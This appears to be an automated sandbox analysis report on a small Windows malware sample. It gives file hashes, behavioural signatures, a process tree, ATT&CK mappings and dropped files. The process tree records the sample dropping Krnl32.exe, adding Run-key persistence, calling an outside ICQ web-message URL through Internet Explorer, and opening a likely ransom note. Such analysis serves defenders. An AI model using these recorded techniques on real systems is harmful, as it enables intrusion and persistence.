Analysis

  • max time kernel
    141s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-05-2024 02:30

General

  • Target

    7841679a708383a6506f889f6acc6560_NeikiAnalytics.exe

  • Size

    26KB

  • MD5

    7841679a708383a6506f889f6acc6560

  • SHA1

    5fd0854563ff26d8772350d21e23d2bd0e3ce8dd

  • SHA256

    272b3b434db2ba30b84a82b449118df53a1cbecfe56f7d8fde85217832ca7dea

  • SHA512

    65ace7ac401c60ecb6d0d1bd160a0e7c6e47d741a90ef118dba56d852cf76721eabeeb2322684df376699b6be87be52f3950d34805fa840a72bd26bdb74067ef

  • SSDEEP

    768:qq3G3q83wdv7GLGS1R9TNoINEx9jnhwrg:Jkq83wdv7Gt+

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops file in System32 directory 64 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 44 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 43 IoCs
  • Modifies registry class 2 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7841679a708383a6506f889f6acc6560_NeikiAnalytics.exe
    "C:\Users\Admin\AppData\Local\Temp\7841679a708383a6506f889f6acc6560_NeikiAnalytics.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:5444
    • C:\Users\Admin\AppData\Local\Temp\Krnl32.exe
      "C:\Users\Admin\AppData\Local\Temp\Krnl32.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Adds Run key to start application
      • Drops file in System32 directory
      • Drops file in Program Files directory
      • Drops file in Windows directory
      • Suspicious use of WriteProcessMemory
      PID:3692
      • C:\Program Files\Internet Explorer\Iexplore.exe
        "C:\Program Files\Internet Explorer\Iexplore.exe" http://wwp.icq.com/scripts/WWPMsg.dll?from=M4TrIx&fromemail=_&subject=MATRIX&body=THE%20MATRIX%20HAS%20COME...&to=90012647%20HTTP/1.0
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2628
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2628 CREDAT:17410 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:3504
    • C:\Windows\SysWOW64\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\HELPME.TXT
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:1472

Network

MITRE ATT&CK Matrix ATT&CK v13

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Defense Evasion

Modify Registry

2
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    Filesize

    471B

    MD5

    01409a92b179c99711ea8c28d307d0c4

    SHA1

    a9cc2b0c5727e2af14819f3908c4693f8e891392

    SHA256

    3034962a4c308ef5e66a2de7faf1ed2439b7e59086a8c07ad59ce3669b8ee01c

    SHA512

    8e86173a54d253f3e05443c603222b9018d63a3fb8e3a26b2b5602c083c07b117d5c53ede08056b6aa4503380562444c6704de32b2cce76f146478616b7278c9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    Filesize

    404B

    MD5

    d6df6b046a165f08fd0b48a6ec94aafd

    SHA1

    7e06a5b1c56e12880e376ea101212b7ea52a2a52

    SHA256

    5e13e17826fa1eddb782741fe2e6e9730e2831eca71da564872ea911254c6c1a

    SHA512

    2ea25a21970a3936a048c690376a3194e62219b3309bb8b800b72aaccb2de09c69900ee2f5722daf697d5f33e3529aa53016f8645effdf543baa258a4f1c5718

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\ver7431.tmp
    Filesize

    15KB

    MD5

    1a545d0052b581fbb2ab4c52133846bc

    SHA1

    62f3266a9b9925cd6d98658b92adec673cbe3dd3

    SHA256

    557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1

    SHA512

    bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\zm934n9\imagestore.dat
    Filesize

    4KB

    MD5

    6970f848f33eb1ceefae13d30f9d2001

    SHA1

    499ced1b869845448d219e801b5542b2c4634bc1

    SHA256

    f02d07a6583d37298cf04ffa9d735573749556459fa62b1043a5360487d06d33

    SHA512

    f8039d0ec5f374310628bb162c2ff304b7715cedf30ff3ff9f9807decc924ad6dced730d317b5aee5553498b563e2cd1d219b97a4a4983771c12442103254890

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\79ZXHV21\en[1].htm
    Filesize

    62KB

    MD5

    d8db562dd4b19b7d1dec71cee88fe513

    SHA1

    f8374927d7205976f2e63cdbe9d482902e203c3b

    SHA256

    f94ad6af48f4c786bf3644818a8926efbe57b12a9379f41b26f31b90ba6de7f0

    SHA512

    0dd3299f8f24ef9b9b838f33dbfe07215e1f460df2c5dfeb2500766449feb7786564b74503f15ecc145bdbaf742e8df9cfc26aadb13385e3a6d0d190a8717e55

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\CMMYN4JX\icon_web_60[1].png
    Filesize

    4KB

    MD5

    e9dbf6c742169ea700f8386bf639911b

    SHA1

    2fce93e1b217283c3d7c8ef275748ad69f840815

    SHA256

    3ce3371ecd679c4e218474046aa2a2ab067dbac5370b983aa8e7d91b208d816b

    SHA512

    2809218b84cda633e6c5c2e47d8d65c23c1ea05a88b5ee970c6bc6265223ef6e94f0d30605e1f15601ecdc68700eca299990314468a37109cac87b30c575d234

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\Q7QYTB89\suggestions[1].en-US
    Filesize

    17KB

    MD5

    5a34cb996293fde2cb7a4ac89587393a

    SHA1

    3c96c993500690d1a77873cd62bc639b3a10653f

    SHA256

    c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

    SHA512

    e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

  • C:\Users\Admin\AppData\Local\Temp\HELPME.TXT
    Filesize

    67B

    MD5

    057798d389930107a381a2690141ac1d

    SHA1

    e44f1c2475c0f2323507e141dcae53ffef51c624

    SHA256

    5ba8c75f08589b808a6e16225ea565734aeeb23edc40894174d2d135f5e8d3d2

    SHA512

    98b40b6a11027974b482cb645718d34c8ee707ad01d6eba05acbf15a3b8d7c762afc08fef6513623fefe6e297d77a838fbb980d944a4a8e864356dfabac473e2

  • C:\Users\Admin\AppData\Local\Temp\Krnl32.exe
    Filesize

    26KB

    MD5

    3990474b0ba3df7ba0bb3c5537763184

    SHA1

    8fb7541fc9f4ac564ed6d2efc7dc910ad1c0ece9

    SHA256

    7accb2b0d536bd8f599c24d6475e8b17af7802d1f9464f9b7b1df659046c8b3e

    SHA512

    3a7b369c4f941d1d78b378973148a0ceb383b7445f987dd88bc1ecea6aee63e7b39b13cda3e0a458f058968b711231cc5689e24aad8f60ecaf17ed0745285447

  • memory/3692-141-0x0000000000400000-0x0000000000413000-memory.dmp
    Filesize

    76KB

  • memory/3692-122-0x0000000000400000-0x0000000000413000-memory.dmp
    Filesize

    76KB

  • memory/3692-124-0x0000000000400000-0x0000000000413000-memory.dmp
    Filesize

    76KB

  • memory/3692-15-0x0000000000400000-0x0000000000413000-memory.dmp
    Filesize

    76KB

  • memory/3692-27-0x0000000000400000-0x0000000000413000-memory.dmp
    Filesize

    76KB

  • memory/3692-23-0x0000000000400000-0x0000000000413000-memory.dmp
    Filesize

    76KB

  • memory/3692-153-0x0000000000400000-0x0000000000413000-memory.dmp
    Filesize

    76KB

  • memory/3692-156-0x0000000000400000-0x0000000000413000-memory.dmp
    Filesize

    76KB

  • memory/5444-21-0x0000000000400000-0x0000000000413000-memory.dmp
    Filesize

    76KB

  • memory/5444-0-0x0000000000400000-0x0000000000413000-memory.dmp
    Filesize

    76KB